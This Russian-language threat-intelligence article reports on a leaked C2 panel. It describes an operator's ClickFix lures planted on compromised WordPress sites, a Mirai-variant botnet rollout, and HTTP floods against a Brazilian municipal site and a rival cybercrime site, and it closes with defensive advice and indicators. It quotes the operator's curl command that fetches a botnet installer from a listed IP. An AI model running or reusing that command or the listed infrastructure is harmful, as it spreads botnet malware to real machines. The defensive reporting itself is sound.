Утечка панели управления C2 раскрыла многоцелевую кибероперацию: от доставки вредоносного ПО до DDoS-атак на правительственные сайты

Обнаруженная панель, размещённая по адресу 107.158.128[.]79, предоставляла полный доступ к списку пострадавших машин, их метаданным и истории всех переданных команд. Исследователи смогли воспользоваться открытыми интерфейсами прикладного программирования (API) для извлечения данных: через эндпоинт /api/agents они получили перечень идентификаторов агентов, через /api/recon - метаданные жертв, а через /api/results - журналы команд. Более того, панель содержала функции для выполнения команд на отдельных хостах и на всех машинах одновременно, включая загрузку файлов. Такой уровень доступа позволил проанализировать полный спектр действий оператора.

Анализ команд показал, что злоумышленник преследовал три основные цели. Наиболее интересным направлением стало создание инфраструктуры ClickFix - техники социальной инженерии, при которой жертву убеждают скопировать и выполнить вредоносную команду под видом решения технической проблемы. Для этого использовались скомпрометированные сайты на системе управления контентом WordPress.

В своём отчёте исследователи из Ctrl-Alt-Intel детально описали последовательность действий. Сначала оператор проводил базовую разведку скомпрометированного сервера: проверял наличие пользователя root, определял тип веб-сервера, просматривал содержимое веб-директорий и файлов конфигурации WordPress. После этого на 217 сайтов была развёрнута вредоносная плагина z.php, которая загружала дополнительный скрипт file.js с внешнего ресурса. Этот скрипт, в свою очередь, запускал цепочку ClickFix: проверял характеристики браузера посетителя, решал небольшую вычислительную задачу для обхода автоматизированных систем анализа и при успешной проверке отображал поддельное уведомление с предложением скопировать команду в буфер обмена. Выполнение этой команды приводило к заражению системы вредоносным ПО.

Среди подтверждённых жертв этой кампании оказался сайт сети ресторанов TGI Fridays. Сканирование этого домена, проведённое исследователями в середине апреля, показало, что сайт всё ещё оставался скомпрометированным. Домены, используемые для доставки вредоносных скриптов (sceuppe.com, windlrr.com, nitzschi.com), были связаны другими исследователями с загрузчиком KongTuke - вредоносной программой, которая часто используется для доставки дополнительных нагрузок, включая программы-вымогатели и стилеры данных.

Вторым направлением деятельности оператора стала попытка построения ботнета на основе варианта Mirai - известной вредоносной программы, заражающей устройства интернета вещей и использующей их для проведения распределённых атак типа "отказ в обслуживании" (DDoS). Команда curl -o ohshit.sh http://45.141.26.73/ohshit.sh была отправлена на 216 скомпрометированных серверов. Анализ этого скрипта показал, что он загружает бинарный файл ботнета с именем FuckYou, соответствующий архитектуре процессора жертвы, и запускает его.

Третье направление, пожалуй, самое необычное, - это межгрупповые конфликты в киберпреступной среде. Из журнала команд видно, что оператор отправил команды на 202 машины одновременно, запустив бесконечный цикл HTTP-запросов к двум целям: официальному сайту муниципалитета Тризидела-ду-Вали в бразильском штате Мараньян и сайту grabber.cy. Последний, по данным исторических записей, рекламировал вредоносное ПО типа infostealer под названием TOK Grabber. Таким образом, злоумышленник использовал скомпрометированные серверы для проведения HTTP-флуд-атак как на правительственный ресурс, так и на сайт конкурирующего киберпреступного сервиса.

Примечательно, что исследователи нашли дополнительные данные, связывающие эту DDoS-активность с другими действующими лицами. В частности, был обнаружен канал в Telegram, рекламирующий сервис LavaC2, а также видеозапись на YouTube, на которой аффилированный с этим сервисом актёр демонстрирует DDoS-атаку именно на grabber.cy. Впрочем, авторы отчёта подчёркивают, что это не обязательно означает прямую связь - возможно, два разных злоумышленника независимо друг от друга атаковали одну и ту же цель.

С точки зрения последствий, данный инцидент демонстрирует эволюцию тактики киберпреступников, которые всё чаще рассматривают скомпрометированные веб-сайты как универсальный ресурс. Один и тот же доступ используется для создания инфраструктуры доставки вредоносного ПО, наращивания вычислительной мощности ботнета и проведения атак на конкурентов или государственные учреждения. Особую тревогу вызывает тот факт, что среди жертв оказался сайт TGI Fridays - известного международного бренда, что указывает на глобальный масштаб кампании.

Важно отметить, что данная операция не отличается высокой сложностью технических приёмов. Злоумышленник полагался на массовость и повторное использование одних и тех же инструментов. Однако именно эта простота в сочетании с разнообразием целей делает кампанию опасной: скомпрометированные сайты могут использоваться для атак на посетителей, на другие ресурсы и даже для внутренних конфликтов в преступной среде.

Для специалистов по информационной безопасности этот случай служит напоминанием о необходимости тщательного мониторинга веб-серверов на предмет несанкционированных изменений файловой системы и установки подозрительных плагинов. Использование систем обнаружения вторжений и регулярные аудиты целостности файлов конфигурации WordPress могут помочь выявить компрометацию на ранней стадии. Кроме того, важно обращать внимание на необычные исходящие соединения с веб-серверов, особенно на загрузку скриптов с внешних ресурсов.

Обнаружение открытой панели управления C2 стало редкой удачей для исследовательского сообщества, позволив составить полную картину операционной деятельности киберпреступной группы. Хотя сама панель уже недоступна, полученные данные помогут лучше понять механизмы взаимодействия между различными этапами атак - от первоначального взлома до использования ресурсов для вторичных целей.

IPv4

• 107.158.128.79
• 45.141.26.73

Domains

• grabber.cy
• nitzschi.com
• ohshit.sh
• sceuppe.com
• windlrr.com